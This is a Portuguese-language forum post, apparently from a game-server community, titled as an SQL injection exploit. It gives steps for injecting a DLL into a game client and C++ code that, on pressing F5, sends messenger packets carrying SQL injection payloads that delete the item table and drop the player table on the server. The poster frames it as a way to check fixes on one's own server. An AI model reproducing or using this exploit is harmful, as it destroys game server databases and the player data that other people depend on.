[Exploit] Injeção Sql

**[Admin] tierrilopes** · May 20, 2016 at 05:13 PM

Como já passou algum tempo, todos os servidores já devem ter isto corrigido.

1-Criar um projecto para dll.

2-Incorporar a pasta extern/include/python do vosso cliente.

3-Injectar a dll e carregar F5 dentro do jogo.

O propósito é verificar se as correções efectuadas no VOSSO servidor estão a funcionar. Não utilizem noutros servidores.

#include <windows.h>

#include <WindowsX.h>

#include <python.h>

#include "stdafx.h"

#include <windows.h>

#include <assert.h>

#include <tlhelp32.h>

#include <aclapi.h>

#include <psapi.h>

#include <imagehlp.h>

#include <iostream>

#include <string>

#include <vector>

#include <time.h>

void Delete_db()

{

PyRun_SimpleString("import net");

PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DELETE FROM item; --\", \"ss\")");

PyRun_SimpleString("net.SendMessengerRemovePacket(\"';DROP TABLE player; --\", \"ss\")");

MessageBoxA(NULL, "Command sent!", "Sent", NULL);

}

void sql_inject()

{

I:

if (GetAsyncKeyState(VK_F5)) Delete_db();

goto I;

}

BOOL APIENTRY DLLSQL_INJECT(HMODULE mod, DWORD reason, LPVOID re)

{

if (reason == DLL_PROCESS_ATTACH) CreateThread(NULL, NULL, LPTHREAD_START_ROUTINE(sql_inject), NULL, NULL, NULL);

return TRUE;

}

Recommended Posts